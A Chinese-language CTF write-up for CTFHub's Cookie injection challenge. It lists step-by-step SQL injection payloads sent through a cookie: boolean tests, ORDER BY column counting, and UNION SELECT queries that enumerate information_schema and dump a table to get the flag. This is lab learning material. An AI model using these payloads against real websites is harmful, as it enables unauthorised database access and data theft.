0x00 前言
CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。
0x01 题目描述
Cookie注入:
(无)
0x02 解题过程
根据网页显示内容提示,这题关于 Cookie 注入,Cookie 注入和之前的注入手法一致,只不过需要在网页 Cookie 中修改其参数进行注入判断,那么直接打开工具 BurpSuite 对题目网站进行抓包。判断发现存在 Cookie 注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。
Ⅰ使用Burpsuite工具对题目网站进行抓包
Ⅱ使用'and 1 = 1'进行测试,判断是否存在sql注入
and 1 = 1
Ⅲ使用’and 1 = 2'进行测试,回显错误,说明存在sql注入
and 1 = 2
Ⅳ使用order by 判断字段数量,从order by 1开始
order by 1
Ⅴ判断字段2,使用order by 2
order by 2
Ⅵ判断字段3,使用order by 3,这里无回显,那么字段数量为2列
order by 3
Ⅶ知道字段数量为2后,可以查看数据库位置,使用union select 1,2查看未发现数据
union select 1,2
Ⅷ判断数据可能不存在数据库中,在id=1中加入负号查看数据,其他符号也可以
id=-1 union select 1,2
Ⅸ修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22
union select 1,version()
Ⅹ修改2为database(),查看数据库名,发现数据库版本为sqli
union select 1,database()
ⅩⅠ查看全部数据库名
union select 1,group_concat(schema_name)from information_schema.schemata
ⅩⅡ在全部数据库名中发现sqli,最后在sqli数据库中发现news和mrqonpoxwm两个表名
union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
ⅩⅢ先查看mrqonpoxwm表中的全部字段名,发现一个数据名为umzfngtnsk
union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='mrqonpoxwm'
ⅩⅣ查看数据umzfngtnsk中的内容,发现此题flag
union select 1,group_concat(umzfngtnsk) from sqli.mrqonpoxwm
0x03 Cookie 注入原理
Cookie 注入的原理也和其他注入一样,只不过是将提交的参数已 Cookie 方式提交,而一般的注入是使用 GET 或者 POST 方式提交,GET 方式提交就是直接在网址后面加上需要注入的语句,POST 方式则是通过表单,GET 和 POST 的不同之处就在于可以通过 IE 地址栏处看到我们提交的参数,而 Cookie 注入却不能。
0x04 参考文献
[1].tooltime. cookie注入原理详解(一)[EB/OL]. [2022-11-20]. https://www.cnblogs.com/insane-Mr-Li/p/9142681.html.
0x05 总结
文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。